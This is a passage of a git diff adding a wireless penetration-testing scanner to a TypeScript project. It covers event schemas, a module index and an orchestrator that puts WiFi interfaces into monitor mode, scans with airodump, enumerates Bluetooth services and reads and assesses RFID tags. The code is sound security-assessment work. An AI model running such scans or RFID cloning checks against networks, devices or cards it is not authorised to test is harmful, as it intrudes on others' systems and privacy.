+            lines.push(`  - ${finding.title}`)
+            if (finding.cve) lines.push(`    CVE: ${finding.cve}`)
+            lines.push(`    ${finding.recommendation}`)
+          }
+          lines.push("")
+        }
+      }
+    }
+
+    lines.push("Recommendations:")
+    lines.push("  1. Keep all device firmware up to date")
+    lines.push("  2. Disable Bluetooth when not in use")
+    lines.push("  3. Use strong pairing methods (avoid Just Works)")
+    lines.push("  4. Avoid pairing in public locations")
+    lines.push("  5. Remove unused paired devices")
+
+    return lines.join("\n")
+  }
+
+  // ========== Statistics ==========
+
+  /**
+   * Get vulnerability statistics.
+   */
+  export function getStats(): {
+    total: number
+    bySeverity: Record<string, number>
+    byType: Record<string, number>
+    totalCVEs: number
+  } {
+    const bySeverity: Record<string, number> = {}
+    const byType: Record<string, number> = {}
+    let totalCVEs = 0
+
+    for (const vuln of VULNERABILITIES) {
+      bySeverity[vuln.severity] = (bySeverity[vuln.severity] || 0) + 1
+      byType[vuln.type] = (byType[vuln.type] || 0) + 1
+      totalCVEs += vuln.cves.length
+    }
+
+    return {
+      total: VULNERABILITIES.length,
+      bySeverity,
+      byType,
+      totalCVEs,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/events.ts b/packages/opencode/src/pentest/wirelessscan/events.ts
new file mode 100644
index 00000000000..65621994e6f
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/events.ts
@@ -0,0 +1,446 @@
+/**
+ * @fileoverview Wireless Scanner Events
+ *
+ * Event definitions for wireless security scanning.
+ *
+ * @module pentest/wirelessscan/events
+ */
+
+import z from "zod"
+import { BusEvent } from "../../bus/bus-event"
+import { WirelessScanTypes } from "./types"
+
+/**
+ * Wireless scanner events namespace.
+ */
+export namespace WirelessScanEvents {
+  // ========== Scan Lifecycle Events ==========
+
+  /**
+   * Scan started event.
+   */
+  export const ScanStarted = BusEvent.define(
+    "pentest.wirelessscan.scan_started",
+    z.object({
+      scanId: z.string(),
+      profile: z.string(),
+      interfaces: z.array(z.string()).optional(),
+      options: WirelessScanTypes.ScanOptions.optional(),
+      wirelessTypes: z.array(WirelessScanTypes.WirelessType).optional(),
+    })
+  )
+
+  /**
+   * Scan completed event.
+   */
+  export const ScanCompleted = BusEvent.define(
+    "pentest.wirelessscan.scan_completed",
+    z.object({
+      scanId: z.string(),
+      profile: z.string().optional(),
+      status: WirelessScanTypes.ScanStatus.optional(),
+      findingsCount: z.number().optional(),
+      criticalCount: z.number().optional(),
+      highCount: z.number().optional(),
+      mediumCount: z.number().optional(),
+      duration: z.number().optional(),
+      findingCount: z.number().optional(),
+      networkCount: z.number().optional(),
+      deviceCount: z.number().optional(),
+      tagCount: z.number().optional(),
+    })
+  )
+
+  /**
+   * Scan failed event.
+   */
+  export const ScanFailed = BusEvent.define(
+    "pentest.wirelessscan.scan_failed",
+    z.object({
+      scanId: z.string(),
+      error: z.string(),
+      phase: z.string().optional(),
+    })
+  )
+
+  /**
+   * Scan progress event.
+   */
+  export const ScanProgress = BusEvent.define(
+    "pentest.wirelessscan.scan_progress",
+    z.object({
+      scanId: z.string(),
+      phase: z.string(),
+      progress: z.number(),
+      message: z.string().optional(),
+    })
+  )
+
+  /**
+   * Scan cancelled event.
+   */
+  export const ScanCancelled = BusEvent.define(
+    "pentest.wirelessscan.scan_cancelled",
+    z.object({
+      scanId: z.string(),
+    })
+  )
+
+  // ========== WiFi Events ==========
+
+  /**
+   * WiFi scan started event.
+   */
+  export const WiFiScanStarted = BusEvent.define(
+    "pentest.wirelessscan.wifi_scan_started",
+    z.object({
+      scanId: z.string(),
+      interface: z.string(),
+      channel: z.number().optional(),
+    })
+  )
+
+  /**
+   * WiFi network found event.
+   */
+  export const NetworkFound = BusEvent.define(
+    "pentest.wirelessscan.network_found",
+    z.object({
+      scanId: z.string(),
+      bssid: z.string(),
+      essid: z.string(),
+      channel: z.number(),
+      encryption: WirelessScanTypes.WiFiEncryption,
+      signal: z.number(),
+    })
+  )
+
+  /**
+   * WiFi network found event (orchestrator version with ssid).
+   */
+  export const WiFiNetworkFound = BusEvent.define(
+    "pentest.wirelessscan.wifi_network_found",
+    z.object({
+      scanId: z.string(),
+      bssid: z.string(),
+      ssid: z.string().optional(),
+      channel: z.number(),
+      encryption: WirelessScanTypes.WiFiEncryption,
+    })
+  )
+
+  /**
+   * WiFi scan completed event.
+   */
+  export const WiFiScanCompleted = BusEvent.define(
+    "pentest.wirelessscan.wifi_scan_completed",
+    z.object({
+      scanId: z.string(),
+      networkCount: z.number(),
+      clientCount: z.number(),
+    })
+  )
+
+  /**
+   * WiFi client found event.
+   */
+  export const ClientFound = BusEvent.define(
+    "pentest.wirelessscan.client_found",
+    z.object({
+      scanId: z.string(),
+      mac: z.string(),
+      bssid: z.string().optional(),
+      vendor: z.string().optional(),
+      probes: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Handshake captured event.
+   */
+  export const HandshakeCaptured = BusEvent.define(
+    "pentest.wirelessscan.handshake_captured",
+    z.object({
+      scanId: z.string(),
+      bssid: z.string(),
+      essid: z.string().optional(),
+      type: z.enum(["4-way", "pmkid", "half"]),
+      clientMac: z.string().optional(),
+      filePath: z.string().optional(),
+    })
+  )
+
+  /**
+   * Rogue AP detected event.
+   */
+  export const RogueAPDetected = BusEvent.define(
+    "pentest.wirelessscan.rogue_ap_detected",
+    z.object({
+      scanId: z.string(),
+      bssid: z.string(),
+      essid: z.string(),
+      reason: z.string(),
+      confidence: z.number(),
+      legitimateBssid: z.string().optional(),
+    })
+  )
+
+  /**
+   * Deauth attack detected event.
+   */
+  export const DeauthDetected = BusEvent.define(
+    "pentest.wirelessscan.deauth_detected",
+    z.object({
+      scanId: z.string(),
+      sourceMac: z.string(),
+      targetMac: z.string(),
+      bssid: z.string(),
+      count: z.number(),
+    })
+  )
+
+  /**
+   * WPS vulnerability found event.
+   */
+  export const WPSVulnerable = BusEvent.define(
+    "pentest.wirelessscan.wps_vulnerable",
+    z.object({
+      scanId: z.string(),
+      bssid: z.string(),
+      essid: z.string(),
+      wpsVersion: z.string().optional(),
+      locked: z.boolean(),
+    })
+  )
+
+  // ========== Bluetooth Events ==========
+
+  /**
+   * Bluetooth scan started event.
+   */
+  export const BluetoothScanStarted = BusEvent.define(
+    "pentest.wirelessscan.bluetooth_scan_started",
+    z.object({
+      scanId: z.string(),
+      interface: z.string(),
+    })
+  )
+
+  /**
+   * Bluetooth device found event.
+   */
+  export const BluetoothFound = BusEvent.define(
+    "pentest.wirelessscan.bluetooth_found",
+    z.object({
+      scanId: z.string(),
+      address: z.string(),
+      name: z.string().optional(),
+      type: WirelessScanTypes.BluetoothType,
+      rssi: z.number().optional(),
+      manufacturer: z.string().optional(),
+    })
+  )
+
+  /**
+   * Bluetooth device found event (orchestrator version).
+   */
+  export const BluetoothDeviceFound = BusEvent.define(
+    "pentest.wirelessscan.bluetooth_device_found",
+    z.object({
+      scanId: z.string(),
+      address: z.string(),
+      name: z.string().optional(),
+      type: WirelessScanTypes.BluetoothType,
+      rssi: z.number().optional(),
+    })
+  )
+
+  /**
+   * Bluetooth scan completed event.
+   */
+  export const BluetoothScanCompleted = BusEvent.define(
+    "pentest.wirelessscan.bluetooth_scan_completed",
+    z.object({
+      scanId: z.string(),
+      deviceCount: z.number(),
+      bleCount: z.number(),
+      classicCount: z.number(),
+    })
+  )
+
+  /**
+   * BLE service found event.
+   */
+  export const BLEServiceFound = BusEvent.define(
+    "pentest.wirelessscan.ble_service_found",
+    z.object({
+      scanId: z.string(),
+      address: z.string(),
+      uuid: z.string(),
+      name: z.string().optional(),
+      characteristicsCount: z.number(),
+    })
+  )
+
+  /**
+   * BLE characteristic found event.
+   */
+  export const BLECharacteristicFound = BusEvent.define(
+    "pentest.wirelessscan.ble_characteristic_found",
+    z.object({
+      scanId: z.string(),
+      address: z.string(),
+      serviceUuid: z.string(),
+      uuid: z.string(),
+      properties: z.array(z.string()),
+    })
+  )
+
+  /**
+   * Bluetooth vulnerability found event.
+   */
+  export const BluetoothVulnerable = BusEvent.define(
+    "pentest.wirelessscan.bluetooth_vulnerable",
+    z.object({
+      scanId: z.string(),
+      address: z.string(),
+      name: z.string().optional(),
+      vulnerability: z.string(),
+      cve: z.string().optional(),
+    })
+  )
+
+  // ========== RFID/NFC Events ==========
+
+  /**
+   * RFID scan started event.
+   */
+  export const RFIDScanStarted = BusEvent.define(
+    "pentest.wirelessscan.rfid_scan_started",
+    z.object({
+      scanId: z.string(),
+      reader: z.string(),
+    })
+  )
+
+  /**
+   * RFID tag found event.
+   */
+  export const RFIDTagFound = BusEvent.define(
+    "pentest.wirelessscan.rfid_tag_found",
+    z.object({
+      scanId: z.string(),
+      uid: z.string(),
+      type: WirelessScanTypes.RFIDTagType,
+      frequency: WirelessScanTypes.RFIDFrequency,
+      protocol: WirelessScanTypes.RFIDProtocol.optional(),
+    })
+  )
+
+  /**
+   * RFID scan completed event.
+   */
+  export const RFIDScanCompleted = BusEvent.define(
+    "pentest.wirelessscan.rfid_scan_completed",
+    z.object({
+      scanId: z.string(),
+      tagCount: z.number(),
+      vulnerableCount: z.number(),
+    })
+  )
+
+  /**
+   * RFID reader found event.
+   */
+  export const RFIDReaderFound = BusEvent.define(
+    "pentest.wirelessscan.rfid_reader_found",
+    z.object({
+      scanId: z.string(),
+      name: z.string(),
+      type: z.string(),
+      port: z.string().optional(),
+      capabilities: z.array(z.string()),
+    })
+  )
+
+  /**
+   * RFID vulnerability found event.
+   */
+  export const RFIDVulnerable = BusEvent.define(
+    "pentest.wirelessscan.rfid_vulnerable",
+    z.object({
+      scanId: z.string(),
+      uid: z.string(),
+      type: WirelessScanTypes.RFIDTagType,
+      vulnerability: z.string(),
+      defaultKeys: z.boolean().optional(),
+    })
+  )
+
+  // ========== Finding Events ==========
+
+  /**
+   * Finding detected event.
+   */
+  export const FindingDetected = BusEvent.define(
+    "pentest.wirelessscan.finding_detected",
+    z.object({
+      scanId: z.string(),
+      findingId: z.string(),
+      wirelessType: WirelessScanTypes.WirelessType,
+      category: WirelessScanTypes.FindingCategory,
+      severity: WirelessScanTypes.Severity,
+      title: z.string(),
+      target: WirelessScanTypes.FindingTarget,
+    })
+  )
+
+  /**
+   * Critical finding detected event.
+   */
+  export const CriticalFinding = BusEvent.define(
+    "pentest.wirelessscan.critical_finding",
+    z.object({
+      scanId: z.string(),
+      findingId: z.string(),
+      title: z.string(),
+      target: WirelessScanTypes.FindingTarget,
+      vulnerability: z.string().optional(),
+    })
+  )
+
+  // ========== Interface Events ==========
+
+  /**
+   * Interface mode changed event.
+   */
+  export const InterfaceModeChanged = BusEvent.define(
+    "pentest.wirelessscan.interface_mode_changed",
+    z.object({
+      interface: z.string(),
+      previousMode: WirelessScanTypes.InterfaceMode,
+      newMode: WirelessScanTypes.InterfaceMode,
+    })
+  )
+
+  /**
+   * Monitor mode enabled event.
+   */
+  export const MonitorModeEnabled = BusEvent.define(
+    "pentest.wirelessscan.monitor_mode_enabled",
+    z.object({
+      interface: z.string(),
+      monitorInterface: z.string(),
+    })
+  )
+
+  /**
+   * Monitor mode disabled event.
+   */
+  export const MonitorModeDisabled = BusEvent.define(
+    "pentest.wirelessscan.monitor_mode_disabled",
+    z.object({
+      interface: z.string(),
+    })
+  )
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/index.ts b/packages/opencode/src/pentest/wirelessscan/index.ts
new file mode 100644
index 00000000000..cf05820fa4a
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/index.ts
@@ -0,0 +1,37 @@
+/**
+ * @fileoverview Wireless Scanner Module
+ *
+ * Comprehensive wireless security scanner for WiFi, Bluetooth, and RFID/NFC.
+ *
+ * ## Features
+ *
+ * - **WiFi Scanning**: Network discovery, security assessment, rogue AP detection
+ * - **Bluetooth Scanning**: Device discovery, BLE service enumeration, vulnerability checks
+ * - **RFID/NFC Scanning**: Tag discovery, type identification, security assessment
+ * - **Multiple Profiles**: Discovery, quick, standard, thorough, passive, active
+ * - **External Tool Integration**: Aircrack-ng, Kismet, Bettercap, Ubertooth
+ *
+ * @module pentest/wirelessscan
+ */
+
+// Core exports
+export { WirelessScanTypes } from "./types"
+export { WirelessScanEvents } from "./events"
+export { WirelessScanStorage } from "./storage"
+export { WirelessScanProfiles } from "./profiles"
+
+// Parser exports
+export * from "./parsers"
+
+// WiFi module exports
+export * from "./wifi"
+
+// Bluetooth module exports
+export * from "./bluetooth"
+
+// RFID module exports
+export * from "./rfid"
+
+// Orchestrator and tool exports
+export { WirelessScanOrchestrator } from "./orchestrator"
+export { WirelessScanTool } from "./tool"
diff --git a/packages/opencode/src/pentest/wirelessscan/orchestrator.ts b/packages/opencode/src/pentest/wirelessscan/orchestrator.ts
new file mode 100644
index 00000000000..480c0478171
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/orchestrator.ts
@@ -0,0 +1,798 @@
+/**
+ * @fileoverview Wireless Scan Orchestrator
+ *
+ * Coordinates wireless security scanning across WiFi, Bluetooth, and RFID/NFC.
+ *
+ * @module pentest/wirelessscan/orchestrator
+ */
+
+import { WirelessScanTypes } from "./types"
+import { WirelessScanStorage } from "./storage"
+import { WirelessScanProfiles } from "./profiles"
+import { WirelessScanEvents } from "./events"
+import { Bus } from "../../bus"
+import { Log } from "../../util/log"
+
+const log = Log.create({ service: "wirelessscan.orchestrator" })
+
+// WiFi imports
+import { WiFiDiscovery } from "./wifi/discovery"
+import { WiFiSecurity } from "./wifi/security"
+import { WiFiRogueAP } from "./wifi/rogue-ap"
+import { WiFiClients } from "./wifi/clients"
+import { WiFiHandshake } from "./wifi/handshake"
+import { WiFiDeauth } from "./wifi/deauth"
+
+// Bluetooth imports
+import { BluetoothDiscovery } from "./bluetooth/discovery"
+import { BluetoothBLE } from "./bluetooth/ble"
+import { BluetoothClassic } from "./bluetooth/classic"
+import { BluetoothVulnerabilities } from "./bluetooth/vulnerabilities"
+
+// RFID imports
+import { RFIDDiscovery } from "./rfid/discovery"
+import { RFIDReaders } from "./rfid/readers"
+import { RFIDCards } from "./rfid/cards"
+import { RFIDCloning } from "./rfid/cloning"
+import { RFIDVulnerabilities } from "./rfid/vulnerabilities"
+
+/**
+ * Wireless scan orchestrator namespace.
+ */
+export namespace WirelessScanOrchestrator {
+  // ========== Scan State ==========
+
+  /**
+   * Active scan state.
+   */
+  interface ScanState {
+    scanId: string
+    profile: WirelessScanTypes.ScanProfile
+    status: WirelessScanTypes.ScanStatus
+    wirelessTypes: WirelessScanTypes.WirelessType[]
+    findings: WirelessScanTypes.WirelessFinding[]
+    networks: WirelessScanTypes.WiFiNetwork[]
+    bluetoothDevices: WirelessScanTypes.BluetoothDevice[]
+    rfidTags: WirelessScanTypes.RFIDTag[]
+    startTime: number
+    endTime?: number
+    error?: string
+  }
+
+  const activeScans = new Map<string, ScanState>()
+
+  // ========== Scan Execution ==========
+
+  /**
+   * Start a wireless scan.
+   */
+  export async function startScan(
+    options: {
+      profileName?: string
+      wirelessTypes?: WirelessScanTypes.WirelessType[]
+      target?: string
+      interface?: string
+      duration?: number
+      channel?: number
+      passive?: boolean
+    },
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<string> {
+    const scanId = WirelessScanStorage.createScanId()
+    const profileId = (options.profileName || "standard") as WirelessScanTypes.ProfileId
+    const profile = WirelessScanProfiles.getProfile(profileId)
+
+    if (!profile) {
+      throw new Error(`Unknown profile: ${options.profileName}`)
+    }
+
+    // Default wireless types based on profile options
+    const defaultTypes: WirelessScanTypes.WirelessType[] = []
+    if (profile.options.wifi) defaultTypes.push("wifi")
+    if (profile.options.bluetooth) defaultTypes.push("bluetooth")
+    if (profile.options.rfid) defaultTypes.push("rfid")
+
+    const wirelessTypes = options.wirelessTypes || profile.wirelessTypes || defaultTypes
+
+    const state: ScanState = {
+      scanId,
+      profile,
+      status: "running",
+      wirelessTypes: wirelessTypes as WirelessScanTypes.WirelessType[],
+      findings: [],
+      networks: [],
+      bluetoothDevices: [],
+      rfidTags: [],
+      startTime: Date.now(),
+    }
+
+    activeScans.set(scanId, state)
+
+    Bus.publish(WirelessScanEvents.ScanStarted, {
+      scanId,
+      profile: profile.name,
+      wirelessTypes,
+    })
+
+    // Run scan asynchronously
+    runScan(state, options, execCommand).catch((error) => {
+      state.status = "failed"
+      state.error = error.message
+      state.endTime = Date.now()
+
+      Bus.publish(WirelessScanEvents.ScanFailed, {
+        scanId,
+        error: error.message,
+      })
+    })
+
+    return scanId
+  }
+
+  /**
+   * Run the scan based on profile and options.
+   */
+  async function runScan(
+    state: ScanState,
+    options: {
+      target?: string
+      interface?: string
+      duration?: number
+      channel?: number
+      passive?: boolean
+    },
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<void> {
+    const { profile, wirelessTypes, scanId } = state
+
+    try {
+      // Run scans for each wireless type
+      if (wirelessTypes.includes("wifi")) {
+        await runWiFiScan(state, options, execCommand)
+      }
+
+      if (wirelessTypes.includes("bluetooth")) {
+        await runBluetoothScan(state, options, execCommand)
+      }
+
+      if (wirelessTypes.includes("rfid")) {
+        await runRFIDScan(state, options, execCommand)
+      }
+
+      // Mark complete
+      state.status = "completed"
+      state.endTime = Date.now()
+
+      // Store results
+      const result = createScanResult(state)
+      await WirelessScanStorage.storeScanResult(result)
+
+      Bus.publish(WirelessScanEvents.ScanCompleted, {
+        scanId,
+        duration: state.endTime - state.startTime,
+        findingCount: state.findings.length,
+        networkCount: state.networks.length,
+        deviceCount: state.bluetoothDevices.length,
+        tagCount: state.rfidTags.length,
+      })
+    } catch (error) {
+      state.status = "failed"
+      state.error = error instanceof Error ? error.message : String(error)
+      state.endTime = Date.now()
+      throw error
+    }
+  }
+
+  // ========== WiFi Scanning ==========
+
+  /**
+   * Run WiFi scan.
+   */
+  async function runWiFiScan(
+    state: ScanState,
+    options: {
+      target?: string
+      interface?: string
+      duration?: number
+      channel?: number
+      passive?: boolean
+    },
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<void> {
+    const { profile, scanId } = state
+
+    // Detect interfaces
+    const interfaces = await WiFiDiscovery.detectInterfaces(execCommand)
+    const iface = options.interface || interfaces.find((i) => i.monitor)?.name || interfaces[0]?.name
+
+    if (!iface) {
+      state.findings.push(createInfoFinding(scanId, "wifi", "No WiFi interfaces detected"))
+      return
+    }
+
+    // Enable monitor mode if needed and not passive-only
+    let monitorIface = iface
+    if (!options.passive && (profile.monitorMode || profile.options.monitorMode)) {
+      const monitorResult = await WiFiDiscovery.enableMonitorMode(iface, execCommand)
+      if (monitorResult.success && monitorResult.monitorInterface) {
+        monitorIface = monitorResult.monitorInterface
+      }
+    }
+
+    // Scan for networks
+    Bus.publish(WirelessScanEvents.WiFiScanStarted, {
+      scanId,
+      interface: monitorIface,
+      channel: options.channel,
+    })
+
+    const scanDuration = options.duration || profile.scanDuration || profile.options.duration || 60
+    const scanResult = await WiFiDiscovery.scanWithAirodump(
+      monitorIface,
+      {
+        duration: scanDuration,
+        channels: options.channel ? [options.channel] : undefined,
+      },
+      execCommand
+    )
+
+    state.networks.push(...scanResult.networks)
+
+    // Emit discovery events
+    for (const network of scanResult.networks) {
+      Bus.publish(WirelessScanEvents.WiFiNetworkFound, {
+        scanId,
+        bssid: network.bssid,
+        ssid: network.ssid || network.essid,
+        channel: network.channel,
+        encryption: network.encryption,
+      })
+    }
+
+    // Security assessment (always run unless explicitly disabled)
+    const doSecurityAnalysis = profile.securityAnalysis !== false
+    if (doSecurityAnalysis) {
+      for (const network of state.networks) {
+        // assessNetwork returns findings directly
+        const findings = WiFiSecurity.assessNetwork(network, scanId)
+        state.findings.push(...findings)
+      }
+    }
+
+    // Rogue AP detection if baseline exists
+    const doRogueAPDetection = profile.rogueAPDetection !== false
+    if (doRogueAPDetection) {
+      const baseline = await WirelessScanStorage.loadBaseline("wifi")
+      if (baseline) {
+        // detectAgainstBaseline returns RogueAP[], need to create findings
+        const rogueAPs = WiFiRogueAP.detectAgainstBaseline(state.networks, baseline, scanId)
+        const rogueFindings = WiFiRogueAP.createFindings(rogueAPs, scanId)
+        state.findings.push(...rogueFindings)
+      }
+
+      // Evil twin detection
+      const evilTwins = WiFiRogueAP.detectEvilTwins(state.networks, scanId)
+      const evilTwinFindings = WiFiRogueAP.createFindings(evilTwins, scanId)
+      state.findings.push(...evilTwinFindings)
+    }
+
+    // Client enumeration - collect clients from networks and analyze
+    const doClientEnumeration = profile.clientEnumeration !== false
+    if (doClientEnumeration) {
+      // Analyze probe requests from clients
+      const allClients = scanResult.clients || []
+      if (allClients.length > 0) {
+        const probeAnalysis = WiFiClients.analyzeProbes(allClients, state.networks)
+        const clientFindings = WiFiClients.createFindings(probeAnalysis, scanId)
+        state.findings.push(...clientFindings)
+      }
+    }
+
+    // Handshake capture detection
+    // Note: Handshakes are not captured by regular airodump scan
+    // They would need a separate capture session with targeted deauth
+    // This section is a placeholder for future implementation
+    const doHandshakeCapture = profile.handshakeCapture !== false
+    if (doHandshakeCapture) {
+      // Handshake capture would be triggered by a separate tool/action
+      log.debug("Handshake capture enabled but requires separate capture session")
+    }
+
+    // Deauth detection - requires actual deauth attack data, not just networks
+    // Skip for now as detectFromNetworks doesn't exist
+    // Deauth detection would need attack monitoring, not network scanning
+
+    Bus.publish(WirelessScanEvents.WiFiScanCompleted, {
+      scanId,
+      networkCount: state.networks.length,
+      clientCount: state.networks.reduce((sum, n) => sum + (n.clients?.length || 0), 0),
+    })
+  }
+
+  // ========== Bluetooth Scanning ==========
+
+  /**
+   * Run Bluetooth scan.
+   */
+  async function runBluetoothScan(
+    state: ScanState,
+    options: {
+      duration?: number
+      passive?: boolean
+    },
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<void> {
+    const { profile, scanId } = state
+
+    // Detect interfaces
+    const interfaces = await BluetoothDiscovery.detectInterfaces(execCommand)
+
+    if (interfaces.length === 0) {
+      state.findings.push(createInfoFinding(scanId, "bluetooth", "No Bluetooth interfaces detected"))
+      return
+    }
+
+    Bus.publish(WirelessScanEvents.BluetoothScanStarted, {
+      scanId,
+      interface: interfaces[0].name,
+    })
+
+    // Scan for devices
+    const duration = options.duration || profile.scanDuration || profile.options.duration || 60
+    const devices = await BluetoothDiscovery.scanAll(duration, execCommand)
+
+    // scanAll returns BluetoothDevice[] directly
+    state.bluetoothDevices.push(...devices)
+
+    // Emit discovery events
+    for (const device of state.bluetoothDevices) {
+      Bus.publish(WirelessScanEvents.BluetoothDeviceFound, {
+        scanId,
+        address: device.address,
+        name: device.name,
+        type: device.type,
+        rssi: device.rssi,
+      })
+    }
+
+    // BLE service enumeration
+    const doBleEnumeration = profile.bleEnumeration !== false
+    if (doBleEnumeration) {
+      for (const device of state.bluetoothDevices) {
+        if (device.type === "ble" || device.type === "dual") {
+          const services = await BluetoothBLE.enumerateServices(device.address, execCommand)
+          device.services = services
+
+          // Analyze services for security issues
+          const serviceAnalysis = BluetoothBLE.analyzeServices(device, scanId)
+          // Service-level findings will be created by the general vulnerability check
+        }
+      }
+    }
+
+    // Classic Bluetooth analysis
+    const doClassicEnumeration = profile.classicEnumeration !== false
+    if (doClassicEnumeration) {
+      for (const device of state.bluetoothDevices) {
+        if (device.type === "classic" || device.type === "dual") {
+          // First discover services for the device
+          const services = await BluetoothClassic.discoverServices(device.address, execCommand)
+          // Then analyze the device with its services
+          const classicFindings = BluetoothClassic.analyzeDevice(device, services, scanId)
+          state.findings.push(...classicFindings)
+        }
+      }
+    }
+
+    // Vulnerability checks
+    const doSecurityAnalysis = profile.securityAnalysis !== false
+    if (doSecurityAnalysis) {
+      for (const device of state.bluetoothDevices) {
+        const vulnFindings = BluetoothVulnerabilities.checkVulnerabilities(device, scanId)
+        state.findings.push(...vulnFindings)
+      }
+    }
+
+    Bus.publish(WirelessScanEvents.BluetoothScanCompleted, {
+      scanId,
+      deviceCount: state.bluetoothDevices.length,
+      bleCount: state.bluetoothDevices.filter((d) => d.type === "ble").length,
+      classicCount: state.bluetoothDevices.filter((d) => d.type === "classic").length,
+    })
+  }
+
+  // ========== RFID Scanning ==========
+
+  /**
+   * Run RFID/NFC scan.
+   */
+  async function runRFIDScan(
+    state: ScanState,
+    options: {
+      duration?: number
+    },
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<void> {
+    const { profile, scanId } = state
+
+    // Detect readers (detectReaders is in RFIDDiscovery)
+    const readers = await RFIDDiscovery.detectReaders(execCommand)
+
+    if (readers.length === 0) {
+      state.findings.push(createInfoFinding(scanId, "rfid", "No RFID/NFC readers detected"))
+      return
+    }
+
+    Bus.publish(WirelessScanEvents.RFIDScanStarted, {
+      scanId,
+      reader: readers[0].name,
+    })
+
+    // Scan for tags (scanTags takes 2 args: reader and execCommand, returns RFIDTag[])
+    const tags = await RFIDDiscovery.scanTags(readers[0], execCommand)
+
+    state.rfidTags.push(...tags)
+
+    // Emit discovery events
+    for (const tag of tags) {
+      const cardInfo = RFIDCards.getCardInfo(tag.type)
+
+      Bus.publish(WirelessScanEvents.RFIDTagFound, {
+        scanId,
+        uid: tag.uid,
+        type: tag.type,
+        frequency: tag.frequency,
+      })
+
+      // Card security assessment
+      const assessment = RFIDCards.assessCardSecurity(tag)
+
+      if (assessment.securityLevel === "none" || assessment.securityLevel === "low") {
+        state.findings.push({
+          id: WirelessScanStorage.createFindingId(),
+          scanId,
+          wirelessType: "rfid",
+          category: "vulnerability",
+          severity: assessment.securityLevel === "none" ? "critical" : "high",
+          title: `Insecure RFID Card: ${cardInfo.name}`,
+          description: `Card uses ${cardInfo.encryption} encryption with ${assessment.securityLevel} security level. ${assessment.vulnerabilities.join(". ")}`,
+          target: {
+            type: "tag",
+            identifier: tag.uid,
+            name: cardInfo.name,
+          },
+          vulnerability: "Weak RFID Security",
+          recommendation: assessment.recommendations.join(". "),
+          references: [],
+          evidence: `Card type: ${tag.type}, UID: ${tag.uid}`,
+          falsePositive: false,
+          verified: false,
+          detectedAt: Date.now(),
+        })
+      }
+    }
+
+    // Vulnerability checks
+    if (profile.securityAnalysis) {
+      for (const tag of state.rfidTags) {
+        const vulnFindings = RFIDVulnerabilities.checkVulnerabilities(tag, scanId)
+        state.findings.push(...vulnFindings)
+      }
+    }
+
+    // Cloning assessment
+    if (profile.cloningAssessment) {
+      const cloningFindings = RFIDCloning.createCloningFindings(state.rfidTags, scanId)
+      state.findings.push(...cloningFindings)
+    }
+
+    // Clone detection
+    const cloneDetection = RFIDCloning.detectPotentialClones(state.rfidTags)
+    for (const suspicious of cloneDetection.suspicious) {
+      const reasons = cloneDetection.reasons.get(suspicious.uid) || []
+      state.findings.push({
+        id: WirelessScanStorage.createFindingId(),
+        scanId,
+        wirelessType: "rfid",
+        category: "vulnerability",
+        severity: "high",
+        title: "Potential Cloned Card Detected",
+        description: `Card ${suspicious.uid} shows indicators of being a clone: ${reasons.join(", ")}`,
+        target: {
+          type: "tag",
+          identifier: suspicious.uid,
+          name: suspicious.type,
+        },
+        vulnerability: "Cloned RFID Card",
+        recommendation: "Investigate card authenticity. Check access logs for anomalies.",
+        references: [],
+        evidence: reasons.join("; "),
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      })
+    }
+
+    Bus.publish(WirelessScanEvents.RFIDScanCompleted, {
+      scanId,
+      tagCount: state.rfidTags.length,
+      vulnerableCount: state.rfidTags.filter((t) => {
+        const info = RFIDCards.getCardInfo(t.type)
+        return info.securityLevel === "none" || info.securityLevel === "low"
+      }).length,
+    })
+  }
+
+  // ========== Scan Management ==========
+
+  /**
+   * Get scan status.
+   */
+  export function getScanStatus(scanId: string): {
+    status: WirelessScanTypes.ScanStatus
+    progress?: number
+    findingCount: number
+    networkCount: number
+    deviceCount: number
+    tagCount: number
+    error?: string
+  } | null {
+    const state = activeScans.get(scanId)
+    if (!state) return null
+
+    return {
+      status: state.status,
+      findingCount: state.findings.length,
+      networkCount: state.networks.length,
+      deviceCount: state.bluetoothDevices.length,
+      tagCount: state.rfidTags.length,
+      error: state.error,
+    }
+  }
+
+  /**
+   * Stop a running scan.
+   */
+  export function stopScan(scanId: string): boolean {
+    const state = activeScans.get(scanId)
+    if (!state || state.status !== "running") return false
+
+    state.status = "cancelled"
+    state.endTime = Date.now()
+
+    Bus.publish(WirelessScanEvents.ScanCancelled, { scanId })
+
+    return true
+  }
+
+  /**
+   * Get scan results.
+   */
+  export function getScanResults(scanId: string): WirelessScanTypes.WirelessScanResult | null {
+    const state = activeScans.get(scanId)
+    if (!state) return null
+
+    return createScanResult(state)
+  }
+
+  // ========== Helper Functions ==========
+
+  /**
+   * Create scan result from state.
+   */
+  function createScanResult(state: ScanState): WirelessScanTypes.WirelessScanResult {
+    return {
+      id: state.scanId,
+      profile: state.profile.name,
+      status: state.status,
+      interfaces: [], // Interface info would be collected during scanning
+      wifi: {
+        networks: state.networks,
+        clients: [],
+        handshakes: [],
+        rogueAPs: [],
+        deauthAttacks: [],
+      },
+      bluetooth: {
+        devices: state.bluetoothDevices,
+        classicDevices: state.bluetoothDevices.filter(d => d.type === "classic").length,
+        bleDevices: state.bluetoothDevices.filter(d => d.type === "ble").length,
+        dualDevices: state.bluetoothDevices.filter(d => d.type === "dual").length,
+      },
+      rfid: {
+        tags: state.rfidTags,
+        readers: [],
+        lfTags: state.rfidTags.filter(t => t.frequency === "125khz" || t.frequency === "134khz").length,
+        hfTags: state.rfidTags.filter(t => t.frequency === "13.56mhz").length,
+      },
+      findings: state.findings,
+      stats: {
+        networksFound: state.networks.length,
+        clientsFound: 0,
+        bluetoothDevicesFound: state.bluetoothDevices.length,
